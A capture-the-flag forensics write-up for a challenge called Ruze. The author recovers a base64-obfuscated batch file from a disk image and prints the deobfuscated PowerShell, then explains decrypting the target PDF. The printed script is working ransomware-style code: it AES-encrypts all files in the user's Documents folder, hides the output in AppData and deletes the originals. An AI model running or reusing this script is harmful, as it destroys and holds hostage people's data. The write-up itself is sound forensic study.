Forensics/Ruze
(I use FTKImager to mount the image, use autopsy for analysis). Found encrypted pdf file, there are other two but its a video, so i think this is the flag
Found .bat containing base64 encoded strings, decode it we will get some script that will encrypt the data
Deobfuscated by ChatGPT
function Encrypt-File {
param (
[string]$inputFilePath,
[string]$outputFilePath,
[string]$encryptionKey,
[string]$initializationVector
)
# Convert the key and IV to byte arrays
$keyBytes = [System.Text.Encoding]::UTF8.GetBytes($encryptionKey)
$ivBytes =
[System.Text.Encoding]::UTF8.GetBytes($initializationVector)
# Validate key and IV lengths
if ($keyBytes.Length -ne 16 -and $keyBytes.Length -ne 24 -and
$keyBytes.Length -ne 32) {
throw "ERROR: Invalid key length."
}
if ($ivBytes.Length -ne 16) {
throw "ERROR: Invalid IV length."
}
# Create AES encryptor
$aes = New-Object "System.Security.Cryptography.AesManaged"
$aes.Key = $keyBytes
$aes.IV = $ivBytes
$aes.Mode = [System.Security.Cryptography.CipherMode]::CBC
$aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
# Read the input file bytes
$fileBytes = [System.IO.File]::ReadAllBytes($inputFilePath)
# Encrypt the file bytes
$encryptor = $aes.CreateEncryptor()
$encryptedBytes = $encryptor.TransformFinalBlock($fileBytes, 0, $fileBytes.Length)
# Combine IV and encrypted data
[byte[]]$finalBytes = $aes.IV + $encryptedBytes
# Write the encrypted bytes to the output file
[System.IO.File]::WriteAllBytes($outputFilePath, $finalBytes)
# Clean up
$aes.Dispose()
Write-Output "Encrypted file: $outputFilePath"
Remove-Item -Path $inputFilePath
}
# Define paths
$documentsPath = "C:\Users\$Env:UserName\Documents"
$encryptedFilesPath =
"C:\Users\$Env:UserName\AppData\Local\Microsoft\Garage"
# Create the directory for encrypted files if it doesn't exist
if (-not (Test-Path -Path $encryptedFilesPath)) {
New-Item -Path $encryptedFilesPath -ItemType Directory -ErrorActionStop
}
# Get the encryption key and IV from the registry
$registryPath = "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\02e7a9afbb77"
$encryptionKey = (Get-ItemProperty -Path $registryPath -Name "59e2beee1b06")."59e2beee1b06"
$initializationVector = (Get-ItemProperty -Path $registryPath -Name "076a2843f321")."076a2843f321"
# Encrypt each file in the Documents folder
Get-ChildItem -Path $documentsPath -File | ForEach-Object {
$inputFilePath = $_.FullName
$outputFilePath = Join-Path -Path $encryptedFilesPath -ChildPath$_.Name
Encrypt-File -inputFilePath $inputFilePath -outputFilePath
$outputFilePath -encryptionKey $encryptionKey -initializationVector
$initializationVector
}
Write-Output "All files encrypted."Notice that the key and IV Stored in here: $registryPath = "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\02e7a9afbb77"
But if you read the hex of the encrypted file, you will see the iv is appended at the beginning of the file (just as the script tells us). So clean it. And decrypt it using the key and IV. I use Cyberchef bcs of skill issues at scripting.